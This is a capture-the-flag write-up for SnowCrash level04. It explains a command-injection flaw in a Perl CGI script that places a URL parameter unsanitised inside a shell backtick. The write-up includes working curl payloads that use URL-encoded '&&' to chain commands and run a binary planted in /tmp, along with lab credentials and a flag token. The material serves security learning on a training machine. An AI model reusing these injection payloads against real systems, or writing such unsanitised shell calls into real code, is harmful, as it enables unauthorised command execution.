# Level 04 ## how to login username: level04 password: qi0maab88jeaj46qoumi7maus ## Goal run `getflag` as user `flag04` ## Actually doing something ```bash level04@SnowCrash:~$ ll total 16 dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./ d--x--x--x 1 root users 340 Aug 30 2015 ../ -r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout* -r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc* -rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl* -r-x------ 1 level04 level04 675 Apr 3 2012 .profile* ``` Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl ```perl #!/usr/bin/perl # localhost:4747 use CGI qw{param}; print "Content-type: text/html\n\n"; sub x { $y = $_[0]; print `echo $y 2>&1`; } x(param("x")); ``` This reeks of exploit As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it The issue is how it returns it... It forward it to a shell string, and print the result. This is as secure as having a litteral endpoint that takes a command and return the result. Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo` command we can run whatever we want for example `getflag` we want this ```perl print `echo $y 2>&1` ``` to become ```perl print `echo idk && getflag 2>&1` ``` We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag` but if we do it dumbly, nothing happens ```bash level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag' idk ``` Why ? Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it. How ? The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&` lets replace it to get `idk%26%26getflag` and voila ! ```bash level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag' GetExploited Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap ``` lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path ```bash level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo' idk Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap ``` Look mom, I recycle my stuff !